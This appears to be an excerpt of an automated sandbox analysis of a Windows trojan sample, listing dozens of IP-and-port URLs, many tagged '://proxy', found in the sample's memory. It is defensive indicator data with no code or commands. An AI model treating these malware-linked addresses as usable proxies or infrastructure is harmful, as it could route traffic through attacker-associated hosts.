                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.222.237.74:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.222.237.74:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.242.212.50:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.242.212.50:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.106:11432
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.106:11432://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.106:16901
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.106:16901://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.106:33328
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.106:33328://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.112:10008
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.112:10008://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.112:30504
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C70EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.112:30504://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:10203
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:10203://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:12250
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:12250://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:13852
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:13852://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:14427
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:14427://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:32244
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.246.139.113:32244://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.136:9510
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.136:9510://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.139:9510
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7833000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.139:9510://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.2.26:21231
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.2.26:21231://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.113.194:55443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.113.194:55443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DEA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C906D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.122.108:61778
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.249.122.108:61778://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.205.129:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.205.129:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.51.78.66:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.51.78.66:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.100.123.135:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.100.123.135:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.115.25.139:4635
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.115.25.139:4635://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.225.195
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.225.195://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.225.195:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.72.27:55770
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.117.72.27:55770://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.243.253:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.243.253:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.243.253:1080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC1AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.180.222.134:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.180.222.134:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.19.123.228:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.19.123.228:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83AE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.24.119:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.24.119:443://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.230.164.47:1234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.230.164.47:1234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.10:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.10:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.90.212.2:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.90.212.2:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.100.18.111:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.100.18.111:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.124.16.218:8901
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.124.16.218:8901://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.181.59:32770
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.181.59:32770://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.109.219:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.109.219:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.14.66:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.137.203:9741
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.142.137.203:9741://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.163.226:81
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.163.226:81://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.252.170:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.252.170:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7618000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.16.118.69:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.16.118.69:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2A2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.217:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.211.217:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.40.18
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.40.18://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.198.40.18:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.20.183.172
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.20.183.172://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.20.183.172:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.206.19.246:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBCE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.206.19.246:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.171.143:50001
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.171.143:50001://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.196.68:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.196.68:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:19547
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:19547://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DFA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:21062
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:21062://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:25256
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBF41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:25256://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:35805
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:35805://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.252.168:9180
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.252.168:9180://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:31633
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:31633://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:41537
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:41537://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:44334
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:44334://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:54028
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:54028://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:60954
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.83.53:60954://proxy
